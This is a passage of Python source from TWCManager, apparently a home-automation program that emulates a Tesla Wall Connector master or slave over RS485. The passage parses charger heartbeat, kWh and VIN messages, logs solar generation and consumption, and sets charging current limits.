if master.getModuleByName("Policy").policyIsGreen():
genwatts = master.getGeneration()
conwatts = master.getConsumption()
conoffset = master.getConsumptionOffset()
chgwatts = master.getChargerLoad()
othwatts = 0
if config["config"]["subtractChargerLoad"]:
if conwatts > 0:
othwatts = conwatts - chgwatts
if conoffset > 0:
othwatts -= conoffset
# Extra parameters to send with logs
logExtra = {
"logtype": "green_energy",
"genWatts": genwatts,
"conWatts": conwatts,
"chgWatts": chgwatts,
"colored": "magenta",
}
if (genwatts or conwatts) and (not conoffset and not othwatts):
logger.info(
"Green energy Generates %s, Consumption %s (Charger Load %s)",
f"{genwatts:.0f}W",
f"{conwatts:.0f}W",
f"{chgwatts:.0f}W",
extra=logExtra,
)
elif (genwatts or conwatts) and othwatts and not conoffset:
logger.info(
"Green energy Generates %s, Consumption %s (Charger Load %s, Other Load %s)",
f"{genwatts:.0f}W",
f"{conwatts:.0f}W",
f"{chgwatts:.0f}W",
f"{othwatts:.0f}W",
extra=logExtra,
)
elif (genwatts or conwatts) and othwatts and conoffset > 0:
logger.info(
"Green energy Generates %s, Consumption %s (Charger Load %s, Other Load %s, Offset %s)",
f"{genwatts:.0f}W",
f"{conwatts:.0f}W",
f"{chgwatts:.0f}W",
f"{othwatts:.0f}W",
f"{conoffset:.0f}W",
extra=logExtra,
)
elif (genwatts or conwatts) and othwatts and conoffset < 0:
logger.info(
"Green energy Generates %s (Offset %s), Consumption %s (Charger Load %s, Other Load %s)",
f"{genwatts:.0f}W",
f"{(-1 * conoffset):.0f}W",
f"{conwatts:.0f}W",
f"{chgwatts:.0f}W",
f"{othwatts:.0f}W",
extra=logExtra,
)
nominalOffer = master.convertWattsToAmps(
genwatts
+ (
chgwatts
if (config["config"]["subtractChargerLoad"] and conwatts == 0)
else 0
)
- (
conwatts
- (
chgwatts
if (config["config"]["subtractChargerLoad"] and conwatts > 0)
else 0
)
)
)
if abs(maxamps - nominalOffer) > 0.005:
nominalOfferDisplay = f"{nominalOffer:.2f}A"
logger.debug(
f"Offering {maxampsDisplay} instead of {nominalOfferDisplay} to compensate for inexact current draw"
)
conwatts = genwatts - master.convertAmpsToWatts(maxamps)
generation = f"{master.convertWattsToAmps(genwatts):.2f}A"
consumption = f"{master.convertWattsToAmps(conwatts):.2f}A"
logger.info(
"Limiting charging to %s - %s = %s.",
generation,
consumption,
maxampsDisplay,
extra={"colored": "magenta"},
)
else:
# For all other modes, simply show the Amps to charge at
logger.info(
"Limiting charging to %s.", maxampsDisplay, extra={"colored": "magenta"}
)
# Print minimum charge for all charging policies
minchg = f"{config['config']['minAmpsPerTWC']}A"
logger.info(
"Charge when above %s (minAmpsPerTWC).", minchg, extra={"colored": "magenta"}
)
# Update Sensors with min/max amp values
for module in master.getModulesByType("Status"):
module["ref"].setStatus(
bytes("config", "UTF-8"),
"min_amps_per_twc",
"minAmpsPerTWC",
config["config"]["minAmpsPerTWC"],
"A",
)
module["ref"].setStatus(
bytes("all", "UTF-8"),
"max_amps_for_slaves",
"maxAmpsForSlaves",
master.getMaxAmpsToDivideAmongSlaves(),
"A",
)
def update_sunrise_sunset():
ltNow = time.localtime()
latlong = master.getHomeLatLon()
if latlong[0] == 10000:
# We don't know where home is; keep defaults
master.settings["sunrise"] = 6
master.settings["sunset"] = 20
else:
sunrise = 6
sunset = 20
url = (
"https://api.sunrise-sunset.org/json?lat="
+ str(latlong[0])
+ "&lng="
+ str(latlong[1])
+ "&formatted=0&date="
+ "-".join([str(ltNow.tm_year), str(ltNow.tm_mon), str(ltNow.tm_mday)])
)
r = {}
try:
r = requests.get(url).json().get("results")
except:
pass
if r.get("sunrise", None):
try:
dtSunrise = datetime.datetime.astimezone(
datetime.datetime.fromisoformat(r["sunrise"])
)
sunrise = dtSunrise.hour + (1 if dtSunrise.minute >= 30 else 0)
except:
pass
if r.get("sunset", None):
try:
dtSunset = datetime.datetime.astimezone(
datetime.datetime.fromisoformat(r["sunset"])
)
sunset = dtSunset.hour + (1 if dtSunset.minute >= 30 else 0)
except:
pass
master.settings["sunrise"] = sunrise
master.settings["sunset"] = sunset
tomorrow = datetime.datetime.combine(
datetime.datetime.today(), datetime.time(hour=1)
) + datetime.timedelta(days=1)
diff = tomorrow - datetime.datetime.now()
master.queue_background_task({"cmd": "sunrise"}, diff.total_seconds())
#
# End functions
#
##############################
##############################
#
# Begin global vars
#
data = ""
dataLen = 0
ignoredData = bytearray()
msg = bytearray()
msgLen = 0
numInitMsgsToSend = 10
msgRxCount = 0
idxSlaveToSendNextHeartbeat = 0
timeLastkWhDelivered = time.time()
timeLastkWhSaved = time.time()
timeLastHeartbeatDebugOutput = 0
webMsgPacked = ""
webMsgMaxSize = 300
webMsgResult = 0
timeTo0Aafter06 = 0
timeToRaise2A = 0
#
# End global vars
#
##############################
##############################
#
# Begin main program
#
# Instantiate necessary classes
master = TWCMaster(fakeTWCID, config)
# Instantiate all modules in the modules_available list automatically
for module in modules_available:
modulename = []
if str(module).find(".") != -1:
modulename = str(module).split(".")
try:
# Pre-emptively skip modules that we know are not configured
configlocation = master.translateModuleNameToConfig(modulename)
if (
not config.get(configlocation[0], {})
.get(configlocation[1], {})
.get("enabled", 1)
):
# We can see that this module is explicitly disabled in config, skip it
continue
moduleref = importlib.import_module("TWCManager." + module)
modclassref = getattr(moduleref, modulename[1])
modinstance = modclassref(master)
# Register the new module with master class, so every other module can
# interact with it
master.registerModule(
{"name": modulename[1], "ref": modinstance, "type": modulename[0]}
)
except ImportError as e:
logger.error(
"%s: " + str(e) + ", when importing %s, not using %s",
"ImportError",
module,
module,
extra={"colored": "red"},
)
except ModuleNotFoundError as e:
logger.info(
"%s: " + str(e) + ", when importing %s, not using %s",
"ModuleNotFoundError",
module,
module,
extra={"colored": "red"},
)
except:
raise
# Load settings from file
master.loadSettings()
# Create a background thread to handle tasks that take too long on the main
# thread. For a primer on threads in Python, see:
# http://www.laurentluce.com/posts/python-threads-synchronization-locks-rlocks-semaphores-conditions-events-and-queues/
backgroundTasksThread = threading.Thread(target=background_tasks_thread, args=(master,))
backgroundTasksThread.daemon = True
backgroundTasksThread.start()
master.queue_background_task({"cmd": "sunrise"}, 30)
logger.info(
"TWC Manager starting as fake %s with id %02X%02X and sign %02X"
% (
("Master" if config["config"]["fakeMaster"] else "Slave"),
ord(fakeTWCID[0:1]),
ord(fakeTWCID[1:2]),
ord(master.getSlaveSign()),
)
)
while True:
try:
# In this area, we always send a linkready message when we first start.
# Whenever there is no data available from other TWCs to respond to,
# we'll loop back to this point to send another linkready or heartbeat
# message. By only sending our periodic messages when no incoming
# message data is available, we reduce the chance that we will start
# transmitting a message in the middle of an incoming message, which
# would corrupt both messages.
# Add a 25ms sleep to prevent pegging pi's CPU at 100%. Lower CPU means
# less power used and less waste heat.
time.sleep(0.025)
now = time.time()
if config["config"]["fakeMaster"] == 1:
# A real master sends 5 copies of linkready1 and linkready2 whenever
# it starts up, which we do here.
# It doesn't seem to matter if we send these once per second or once
# per 100ms so I do once per 100ms to get them over with.
if numInitMsgsToSend > 5:
master.send_master_linkready1()
time.sleep(0.1) # give slave time to respond
numInitMsgsToSend -= 1
elif numInitMsgsToSend > 0:
master.send_master_linkready2()
time.sleep(0.1) # give slave time to respond
numInitMsgsToSend = numInitMsgsToSend - 1
else:
# After finishing the 5 startup linkready1 and linkready2
# messages, master will send a heartbeat message to every slave
# it's received a linkready message from. Do that here.
# A real master would keep sending linkready messages periodically
# as long as no slave was connected, but since real slaves send
# linkready once every 10 seconds till they're connected to a
# master, we'll just wait for that.
if time.time() - master.getTimeLastTx() >= 1.0:
# It's been about a second since our last heartbeat.
if master.countSlaveTWC() > 0:
slaveTWC = master.getSlaveTWC(idxSlaveToSendNextHeartbeat)
if time.time() - slaveTWC.timeLastRx > 26:
# A real master stops sending heartbeats to a slave
# that hasn't responded for ~26 seconds. It may
# still send the slave a heartbeat every once in
# awhile but we're just going to scratch the slave
# from our little black book and add them again if
# they ever send us a linkready.
logger.info(
"WARNING: We haven't heard from slave "
"%02X%02X for over 26 seconds. "
"Stop sending them heartbeat messages."
% (slaveTWC.TWCID[0], slaveTWC.TWCID[1])
)
master.deleteSlaveTWC(slaveTWC.TWCID)
else:
slaveTWC.send_master_heartbeat()
idxSlaveToSendNextHeartbeat = idxSlaveToSendNextHeartbeat + 1
if idxSlaveToSendNextHeartbeat >= master.countSlaveTWC():
idxSlaveToSendNextHeartbeat = 0
time.sleep(0.1) # give slave time to respond
else:
# As long as a slave is running, it sends link ready messages every
# 10 seconds. They trigger any master on the network to handshake
# with the slave and the master then sends a status update from the
# slave every 1-3 seconds. Master's status updates trigger the slave
# to send back its own status update.
# As long as master has sent a status update within the last 10
# seconds, slaves don't send link ready.
# I've also verified that masters don't care if we stop sending link
# ready as long as we send status updates in response to master's
# status updates.
if (
config["config"]["fakeMaster"] != 2
and time.time() - master.getTimeLastTx() >= 10.0
):
logger.info(
"Advertise fake slave %02X%02X with sign %02X is "
"ready to link once per 10 seconds as long as master "
"hasn't sent a heartbeat in the last 10 seconds."
% (
ord(fakeTWCID[0:1]),
ord(fakeTWCID[1:2]),
ord(master.getSlaveSign()),
)
)
master.send_slave_linkready()
# See if there's any message from the web interface.
if master.getModuleByName("WebIPCControl"):
master.getModuleByName("WebIPCControl").processIPC()
# If it has been more than 2 minutes since the last kWh value,
# queue the command to request it from slaves
if config["config"]["fakeMaster"] == 1 and (
(time.time() - master.lastkWhMessage) > (60 * 2)
):
master.lastkWhMessage = time.time()
master.queue_background_task({"cmd": "getLifetimekWh"})
# If it has been more than 1 minute since the last VIN query with no
# response, and if we haven't queried more than 5 times already for this
# slave TWC, repeat the query
master.retryVINQuery()
########################################################################
# See if there's an incoming message on the input interface.
timeMsgRxStart = time.time()
actualDataLen = 0
while True:
now = time.time()
dataLen = master.getInterfaceModule().getBufferLen()
if dataLen == 0:
if msgLen == 0:
# No message data waiting and we haven't received the
# start of a new message yet. Break out of inner while
# to continue at top of outer while loop where we may
# decide to send a periodic message.
break
else:
# No message data waiting but we've received a partial
# message that we should wait to finish receiving.
if now - timeMsgRxStart >= 2.0:
logger.log(
logging.INFO9,
"Msg timeout ("
+ hex_str(ignoredData)
+ ") "
+ hex_str(msg[0:msgLen]),
)
msgLen = 0
ignoredData = bytearray()
break
time.sleep(0.025)
continue
else:
actualDataLen = dataLen
dataLen = 1
data = master.getInterfaceModule().read(dataLen)
if dataLen != 1:
# This should never happen
logger.info("WARNING: No data available.")
break
timeMsgRxStart = now
timeLastRx = now
if msgLen == 0 and len(data) > 0 and data[0] != 0xC0:
# We expect to find these non-c0 bytes between messages, so
# we don't print any warning at standard debug levels.
logger.log(
logging.DEBUG2, "Ignoring byte %02X between messages." % (data[0])
)
ignoredData += data
continue
elif msgLen > 0 and msgLen < 15 and len(data) > 0 and data[0] == 0xC0:
# If you see this when the program is first started, it
# means we started listening in the middle of the TWC
# sending a message so we didn't see the whole message and
# must discard it. That's unavoidable.
# If you see this any other time, it means there was some
# corruption in what we received. It's normal for that to
# happen every once in awhile but there may be a problem
# such as incorrect termination or bias resistors on the
# rs485 wiring if you see it frequently.
logger.debug(
"Found end of message before full-length message received. "
"Discard and wait for new message."
)
msg = data
msgLen = 1
continue
elif dataLen and len(data) == 0:
logger.error(
"We received a buffer length of %s from the RS485 module, but data buffer length is %s. This should not occur."
% (str(actualDataLen), str(len(data)))
)
if msgLen == 0:
msg = bytearray()
msg += data
msgLen += 1
# Messages are usually 17 bytes or longer and end with \xc0\xfe.
# However, when the network lacks termination and bias
# resistors, the last byte (\xfe) may be corrupted or even
# missing, and you may receive additional garbage bytes between
# messages.
#
# TWCs seem to account for corruption at the end and between
# messages by simply ignoring anything after the final \xc0 in a
# message, so we use the same tactic. If c0 happens to be within
# the corrupt noise between messages, we ignore it by starting a
# new message whenever we see a c0 before 15 or more bytes are
# received.
#
# Uncorrupted messages can be over 17 bytes long when special
# values are "escaped" as two bytes. See notes in sendMsg.
#
# To prevent most noise between messages, add a 120ohm
# "termination" resistor in parallel to the D+ and D- lines.
# Also add a 680ohm "bias" resistor between the D+ line and +5V
# and a second 680ohm "bias" resistor between the D- line and
# ground. See here for more information:
# https://www.ni.com/support/serial/resinfo.htm
# http://www.ti.com/lit/an/slyt514/slyt514.pdf
# This explains what happens without "termination" resistors:
# https://e2e.ti.com/blogs_/b/analogwire/archive/2016/07/28/rs-485-basics-when-termination-is-necessary-and-how-to-do-it-properly
if msgLen >= 16 and data[0] == 0xC0:
break
if msgLen >= 16:
msg = unescape_msg(msg, msgLen)
# Set msgLen = 0 at start so we don't have to do it on errors below.
# len($msg) now contains the unescaped message length.
msgLen = 0
msgRxCount += 1
# When the sendTWCMsg web command is used to send a message to the
# TWC, it sets lastTWCResponseMsg = b''. When we see that here,
# set lastTWCResponseMsg to any unusual message received in response
# to the sent message. Never set lastTWCResponseMsg to a commonly
# repeated message like master or slave linkready, heartbeat, or
# voltage/kWh report.
if (
master.lastTWCResponseMsg == b""
and msg[0:2] != b"\xFB\xE0"
and msg[0:2] != b"\xFD\xE0"
and msg[0:2] != b"\xFC\xE1"
and msg[0:2] != b"\xFB\xE2"
and msg[0:2] != b"\xFD\xE2"
and msg[0:2] != b"\xFB\xEB"
and msg[0:2] != b"\xFD\xEB"
and msg[0:2] != b"\xFD\xE0"
):
master.lastTWCResponseMsg = msg
logger.log(
logging.INFO9,
"Rx@" + ": (" + hex_str(ignoredData) + ") " + hex_str(msg) + "",
)
ignoredData = bytearray()
# After unescaping special values and removing the leading and
# trailing C0 bytes, the messages we know about are always 14 bytes
# long in original TWCs, or 16 bytes in newer TWCs (protocolVersion
# == 2).
if len(msg) != 14 and len(msg) != 16 and len(msg) != 20:
logger.info(
"ERROR: Ignoring message of unexpected length %d: %s"
% (len(msg), hex_str(msg))
)
continue
checksumExpected = msg[len(msg) - 1]
checksum = 0
for i in range(1, len(msg) - 1):
checksum += msg[i]
if (checksum & 0xFF) != checksumExpected:
logger.info(
"ERROR: Checksum %X does not match %02X. Ignoring message: %s"
% (checksum, checksumExpected, hex_str(msg))
)
continue
if config["config"]["fakeMaster"] == 1:
############################
# Pretend to be a master TWC
foundMsgMatch = False
# We end each regex message search below with \Z instead of $
# because $ will match a newline at the end of the string or the
# end of the string (even without the re.MULTILINE option), and
# sometimes our strings do end with a newline character that is
# actually the CRC byte with a value of 0A or 0D.
msgMatch = re.search(b"^\xfd\xb1(..)\x00\x00.+\Z", msg, re.DOTALL)
if msgMatch and foundMsgMatch == False:
# Handle acknowledgement of Start command
foundMsgMatch = True
senderID = msgMatch.group(1)
msgMatch = re.search(b"^\xfd\xb2(..)\x00\x00.+\Z", msg, re.DOTALL)
if msgMatch and foundMsgMatch == False:
# Handle acknowledgement of Stop command
foundMsgMatch = True
senderID = msgMatch.group(1)
msgMatch = re.search(
b"^\xfd\xe2(..)(.)(..)\x00\x00\x00\x00\x00\x00.+\Z", msg, re.DOTALL
)
if msgMatch and foundMsgMatch == False:
# Handle linkready message from slave.
#
# We expect to see one of these before we start sending our
# own heartbeat message to slave.
# Once we start sending our heartbeat to slave once per
# second, it should no longer send these linkready messages.
# If slave doesn't hear master's heartbeat for around 10
# seconds, it sends linkready once per 10 seconds and starts
# flashing its red LED 4 times with the top green light on.
# Red LED stops flashing if we start sending heartbeat
# again.
foundMsgMatch = True
senderID = msgMatch.group(1)
sign = msgMatch.group(2)
maxAmps = ((msgMatch.group(3)[0] << 8) + msgMatch.group(3)[1]) / 100
logger.info(
"%.2f amp slave TWC %02X%02X is ready to link. Sign: %s"
% (maxAmps, senderID[0], senderID[1], hex_str(sign))
)
if maxAmps >= 80:
# U.S. chargers need a spike to 21A to cancel a 6A
# charging limit imposed in an Oct 2017 Tesla car
# firmware update. See notes where
# spikeAmpsToCancel6ALimit is used.
master.setSpikeAmps(21)
else:
# EU chargers need a spike to only 16A. This value
# comes from a forum post and has not been directly
# tested.
master.setSpikeAmps(16)
if senderID == fakeTWCID:
logger.info(
"Slave TWC %02X%02X reports same TWCID as master. "
"Slave should resolve by changing its TWCID."
% (senderID[0], senderID[1])
)
# I tested sending a linkready to a real master with the
# same TWCID as master and instead of master sending back
# its heartbeat message, it sent 5 copies of its
# linkready1 and linkready2 messages. Those messages
# will prompt a real slave to pick a new random value
# for its TWCID.
#
# We mimic that behavior by setting numInitMsgsToSend =
# 10 to make the idle code at the top of the for()
# loop send 5 copies of linkready1 and linkready2.
numInitMsgsToSend = 10
continue
# We should always get this linkready message at least once
# and generally no more than once, so this is a good
# opportunity to add the slave to our known pool of slave
# devices.
slaveTWC = master.newSlave(senderID, maxAmps)
if (
slaveTWC.protocolVersion == 1
and slaveTWC.minAmpsTWCSupports == 6
):
if len(msg) == 14:
slaveTWC.protocolVersion = 1
slaveTWC.minAmpsTWCSupports = 5
elif len(msg) == 16:
slaveTWC.protocolVersion = 2
slaveTWC.minAmpsTWCSupports = 6
logger.info(
"Set slave TWC %02X%02X protocolVersion to %d, minAmpsTWCSupports to %d."
% (
senderID[0],
senderID[1],
slaveTWC.protocolVersion,
slaveTWC.minAmpsTWCSupports,
)
)
# We expect maxAmps to be 80 on U.S. chargers and 32 on EU
# chargers. Either way, don't allow
# slaveTWC.wiringMaxAmps to be greater than maxAmps.
if slaveTWC.wiringMaxAmps > maxAmps:
logger.info(
"\n\n!!! DANGER DANGER !!!\nYou have set wiringMaxAmpsPerTWC to "
+ str(config["config"]["wiringMaxAmpsPerTWC"])
+ " which is greater than the max "
+ str(maxAmps)
+ " amps your charger says it can handle. "
"Please review instructions in the source code and consult an "
"electrician if you don't know what to do."
)
slaveTWC.wiringMaxAmps = maxAmps / 4
# Make sure we print one SHB message after a slave
# linkready message is received by clearing
# lastHeartbeatDebugOutput. This helps with debugging
# cases where I can't tell if we responded with a
# heartbeat or not.
slaveTWC.lastHeartbeatDebugOutput = ""
slaveTWC.timeLastRx = time.time()
slaveTWC.send_master_heartbeat()
else:
msgMatch = re.search(
b"\A\xfd\xe0(..)(..)(.......+?).\Z", msg, re.DOTALL
)
if msgMatch and foundMsgMatch == False:
# Handle heartbeat message from slave.
#
# These messages come in as a direct response to each
# heartbeat message from master. Slave does not send its
# heartbeat until it gets one from master first.
# A real master sends heartbeat to a slave around once per
# second, so we do the same near the top of this for()
# loop. Thus, we should receive a heartbeat reply from the
# slave around once per second as well.
foundMsgMatch = True
senderID = msgMatch.group(1)
receiverID = msgMatch.group(2)
heartbeatData = msgMatch.group(3)
try:
slaveTWC = master.getSlaveByID(senderID)
except KeyError:
# Normally, a slave only sends us a heartbeat message if
# we send them ours first, so it's not expected we would
# hear heartbeat from a slave that's not in our list.
logger.info(
"ERROR: Received heartbeat message from "
"slave %02X%02X that we've not met before."
% (senderID[0], senderID[1])
)
continue
if fakeTWCID == receiverID:
slaveTWC.receive_slave_heartbeat(heartbeatData)
else:
# I've tried different fakeTWCID values to verify a
# slave will send our fakeTWCID back to us as
# receiverID. However, I once saw it send receiverID =
# 0000.
# I'm not sure why it sent 0000 and it only happened
# once so far, so it could have been corruption in the
# data or an unusual case.
logger.info(
"WARNING: Slave TWC %02X%02X status data: "
"%s sent to unknown TWC %02X%02X."
% (
senderID[0],
senderID[1],
hex_str(heartbeatData),
receiverID[0],
receiverID[1],
)
)
else:
msgMatch = re.search(
b"\A\xfd\xeb(..)(....)(..)(..)(..)(.+?).\Z", msg, re.DOTALL
)
if msgMatch and foundMsgMatch == False:
# Handle kWh total and voltage message from slave.
#
# This message can only be generated by TWCs running newer
# firmware. I believe it's only sent as a response to a
# message from Master in this format:
# FB EB <Master TWCID> <Slave TWCID> 00 00 00 00 00 00 00 00 00
# According to FuzzyLogic, this message has the following
# format on an EU (3-phase) TWC:
# FD EB <Slave TWCID> 00000038 00E6 00F1 00E8 00
# 00000038 (56) is the total kWh delivered to cars
# by this TWC since its construction.
# 00E6 (230) is voltage on phase A
# 00F1 (241) is voltage on phase B
# 00E8 (232) is voltage on phase C
#
# I'm guessing in world regions with two-phase power that
# this message would be four bytes shorter, but the pattern
# above will match a message of any length that starts with
# FD EB.
foundMsgMatch = True
senderID = msgMatch.group(1)
lifetimekWh = msgMatch.group(2)
kWh = (
(lifetimekWh[0] << 24)
+ (lifetimekWh[1] << 16)
+ (lifetimekWh[2] << 8)
+ lifetimekWh[3]
)
vPhaseA = msgMatch.group(3)
voltsPhaseA = (vPhaseA[0] << 8) + vPhaseA[1]
vPhaseB = msgMatch.group(4)
voltsPhaseB = (vPhaseB[0] << 8) + vPhaseB[1]
vPhaseC = msgMatch.group(5)
voltsPhaseC = (vPhaseC[0] << 8) + vPhaseC[1]
data = msgMatch.group(6)
logger.info(
"Slave TWC %02X%02X: Delivered %d kWh, voltage per phase: (%d, %d, %d).",
senderID[0],
senderID[1],
kWh,
voltsPhaseA,
voltsPhaseB,
voltsPhaseC,
extra={
"logtype": "slave_status",
"TWCID": senderID,
"kWh": kWh,
"voltsPerPhase": [voltsPhaseA, voltsPhaseB, voltsPhaseC],
},
)
# Update the timestamp of the last reciept of this message
master.lastkWhMessage = time.time()
# Every time we get this message, we re-queue the query
master.queue_background_task({"cmd": "getLifetimekWh"})
# Update this detail for the Slave TWC
master.updateSlaveLifetime(
senderID, kWh, voltsPhaseA, voltsPhaseB, voltsPhaseC
)
else:
msgMatch = re.search(
b"\A\xfd(\xee|\xef|\xf1)(..)(.+?).\Z", msg, re.DOTALL
)
if msgMatch and foundMsgMatch == False:
# Get 7 characters of VIN from slave. (XE is first 7, XF second 7)
#
# This message can only be generated by TWCs running newer
# firmware. I believe it's only sent as a response to a
# message from Master in this format:
# FB EE <Master TWCID> <Slave TWCID> 00 00 00 00 00 00 00 00 00
# Response message is FD EE <Slave TWCID> VV VV VV VV VV VV VV where VV is an ascii character code
# representing a letter or number. VV will be all zero when car CAN communication is disabled
# (DIP switch 2 down) or when a non-Tesla vehicle is plugged in using something like a JDapter.
foundMsgMatch = True
vinPart = msgMatch.group(1)
senderID = msgMatch.group(2)
data = msgMatch.group(3)
logger.log(
logging.INFO6,
"Slave TWC %02X%02X reported VIN data: %s."
% (senderID[0], senderID[1], hex_str(data)),
)
slaveTWC = master.getSlaveByID(senderID)
if vinPart == b"\xee":
vinPart = 0
if vinPart == b"\xef":
vinPart = 1
if vinPart == b"\xf1":
vinPart = 2
slaveTWC.VINData[vinPart] = data.decode("utf-8").rstrip("\x00")
if vinPart < 2:
vinPart += 1
master.queue_background_task(
{
"cmd": "getVehicleVIN",
"slaveTWC": senderID,
"vinPart": str(vinPart),
}
)
else:
potentialVIN = "".join(slaveTWC.VINData)
# Ensure we have a valid VIN
if len(potentialVIN) == 17:
# Record Vehicle VIN
slaveTWC.currentVIN = potentialVIN
# Clear VIN retry timer
slaveTWC.lastVINQuery = 0
slaveTWC.vinQueryAttempt = 0
# Record this vehicle being connected
master.recordVehicleVIN(slaveTWC)
# Send VIN data to Status modules
master.updateVINStatus()
# Establish if this VIN should be able to charge
# If not, send stop command
master.queue_background_task(
{
"cmd": "checkVINEntitlement",
"subTWC": slaveTWC,
}
)
vinPart += 1
else:
# Unfortunately the VIN was not the right length.
# Re-request VIN
master.queue_background_task(
{
"cmd": "getVehicleVIN",
"slaveTWC": slaveTWC.TWCID,
"vinPart": 0,
}
)
logger.log(
logging.INFO6,
"Current VIN string is: %s at part %d."
% (str(slaveTWC.VINData), vinPart),
)
else:
msgMatch = re.search(
b"\A\xfc(\xe1|\xe2)(..)(.)\x00\x00\x00\x00\x00\x00\x00\x00.+\Z",
msg,
re.DOTALL,
)
if msgMatch and foundMsgMatch == False:
foundMsgMatch = True
logger.info(
"ERROR: TWC is set to Master mode so it can't be controlled by TWCManager. "
"Search installation instruction PDF for 'rotary switch' and set "
"switch so its arrow points to F on the dial."
)
if foundMsgMatch == False:
logger.info(
"*** UNKNOWN MESSAGE FROM SLAVE:"
+ hex_str(msg)
+ "\nPlease private message user CDragon at http://teslamotorsclub.com "
"with a copy of this error."
)
else:
###########################
# Pretend to be a slave TWC
foundMsgMatch = False
msgMatch = re.search(
b"\A\xfc\xe1(..)(.)\x00\x00\x00\x00\x00\x00\x00\x00+?.\Z",
msg,
re.DOTALL,
)
if msgMatch and foundMsgMatch == False:
# Handle linkready1 from master.
# See notes in send_master_linkready1() for details.
foundMsgMatch = True
senderID = msgMatch.group(1)
sign = msgMatch.group(2)
master.setMasterTWCID(senderID)
# This message seems to always contain seven 00 bytes in its
# data area. If we ever get this message with non-00 data
# we'll print it as an unexpected message.
logger.info(
"Master TWC %02X%02X Linkready1. Sign: %s"
% (senderID[0], senderID[1], hex_str(sign))
)
if senderID == fakeTWCID:
master.master_id_conflict()
# Other than picking a new fakeTWCID if ours conflicts with
# master, it doesn't seem that a real slave will make any
# sort of direct response when sent a master's linkready1 or
# linkready2.
else:
msgMatch = re.search(
b"\A\xfb\xe2(..)(.)\x00\x00\x00\x00\x00\x00\x00\x00+?.\Z",
msg,
re.DOTALL,
)
if msgMatch and foundMsgMatch == False:
# Handle linkready2 from master.
# See notes in send_master_linkready2() for details.
foundMsgMatch = True
senderID = msgMatch.group(1)
sign = msgMatch.group(2)
master.setMasterTWCID(senderID)
# This message seems to always contain seven 00 bytes in its
# data area. If we ever get this message with non-00 data
# we'll print it as an unexpected message.
logger.info(
"Master TWC %02X%02X Linkready2. Sign: %s"
% (senderID[0], senderID[1], hex_str(sign))
)
if senderID == fakeTWCID:
master.master_id_conflict()
else:
msgMatch = re.search(
b"\A\xfb\xe0(..)(..)(.......+?).\Z", msg, re.DOTALL
)
if msgMatch and foundMsgMatch == False:
# Handle heartbeat message from Master.
foundMsgMatch = True
senderID = msgMatch.group(1)
receiverID = msgMatch.group(2)
heartbeatData = msgMatch.group(3)
master.setMasterTWCID(senderID)
try:
slaveTWC = master.slaveTWCs[receiverID]
except KeyError:
slaveTWC = master.newSlave(receiverID, 80)
slaveTWC.masterHeartbeatData = heartbeatData
if receiverID != fakeTWCID:
# This message was intended for another slave.
# Ignore it.
logger.log(
logging.DEBUG2,
"Master %02X%02X sent "
"heartbeat message %s to receiver %02X%02X "
"that isn't our fake slave."
% (
senderID[0],
senderID[1],
hex_str(heartbeatData),
receiverID[0],
receiverID[1],
),
)
continue
amps = (
master.slaveHeartbeatData[1] << 8
) + master.slaveHeartbeatData[2]
master.addkWhDelivered(
(master.convertAmpsToWatts(amps / 100) / 1000 / 60 / 60)
* (now - timeLastkWhDelivered)
)
timeLastkWhDelivered = now
if time.time() - timeLastkWhSaved >= 300.0:
timeLastkWhSaved = now
logger.log(
logging.INFO9,
"Fake slave has delivered %.3fkWh"
% (master.getkWhDelivered()),
)
# Save settings to file
master.queue_background_task({"cmd": "saveSettings"})
if heartbeatData[0] == 0x07:
# Lower amps in use (not amps allowed) by 2 for 10
# seconds. Set state to 07.
master.slaveHeartbeatData[0] = heartbeatData[0]
timeToRaise2A = now + 10
amps -= 280
master.slaveHeartbeatData[3] = (amps >> 8) & 0xFF
master.slaveHeartbeatData[4] = amps & 0xFF
elif heartbeatData[0] == 0x06:
# Raise amp setpoint by 2 permanently and reply with
# state 06. After 44 seconds, report state 0A.
timeTo0Aafter06 = now + 44
master.slaveHeartbeatData[0] = heartbeatData[0]
amps += 200
master.slaveHeartbeatData[1] = (amps >> 8) & 0xFF
master.slaveHeartbeatData[2] = amps & 0xFF
amps -= 80
master.slaveHeartbeatData[3] = (amps >> 8) & 0xFF
master.slaveHeartbeatData[4] = amps & 0xFF
elif (
heartbeatData[0] == 0x05
or heartbeatData[0] == 0x08
or heartbeatData[0] == 0x09
):
if ((heartbeatData[1] << 8) + heartbeatData[2]) > 0:
# A real slave mimics master's status bytes [1]-[2]
# representing max charger power even if the master
# sends it a crazy value.
master.slaveHeartbeatData[1] = heartbeatData[1]
master.slaveHeartbeatData[2] = heartbeatData[2]
ampsUsed = (heartbeatData[1] << 8) + heartbeatData[2]
ampsUsed -= 80
master.slaveHeartbeatData[3] = (ampsUsed >> 8) & 0xFF
master.slaveHeartbeatData[4] = ampsUsed & 0xFF
elif heartbeatData[0] == 0:
if timeTo0Aafter06 > 0 and timeTo0Aafter06 < now:
timeTo0Aafter06 = 0
master.slaveHeartbeatData[0] = 0x0A
elif timeToRaise2A > 0 and timeToRaise2A < now:
# Real slave raises amps used by 2 exactly 10
# seconds after being sent into state 07. It raises
# a bit slowly and sets its state to 0A 13 seconds
# after state 07. We aren't exactly emulating that
# timing here but hopefully close enough.
timeToRaise2A = 0
amps -= 80
master.slaveHeartbeatData[3] = (amps >> 8) & 0xFF
master.slaveHeartbeatData[4] = amps & 0xFF
master.slaveHeartbeatData[0] = 0x0A
elif heartbeatData[0] == 0x02:
logger.info(
"Master heartbeat contains error %ld: %s"
% (heartbeatData[1], hex_str(heartbeatData))
)
else:
logger.info("UNKNOWN MHB state %s" % (hex_str(heartbeatData)))
# Slaves always respond to master's heartbeat by sending
# theirs back.
slaveTWC.send_slave_heartbeat(senderID)
slaveTWC.print_status(master.slaveHeartbeatData)
else:
msgMatch = re.search(
b"\A\xfc\x1d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+?.\Z",
msg,
re.DOTALL,
)
if msgMatch and foundMsgMatch == False:
# Handle 2-hour idle message
#
# This message is sent from a Master TWC three times in a
# row every 2 hours:
# c0 fc 1d 00 00 00 00 00 00 00 00 00 00 00 1d c0
#
# I'd say this is used to indicate the master is still
# alive, but it doesn't contain the Master's TWCID or any other
# data so I don't see what any receiving TWC can do with it.
#
# I suspect this message is only sent when the master
# doesn't see any other TWCs on the network, so I don't
# bother to have our fake master send these messages being
# as there's no point in playing a fake master with no
# slaves around.
foundMsgMatch = True
logger.info("Received 2-hour idle message from Master.")
else:
msgMatch = re.search(
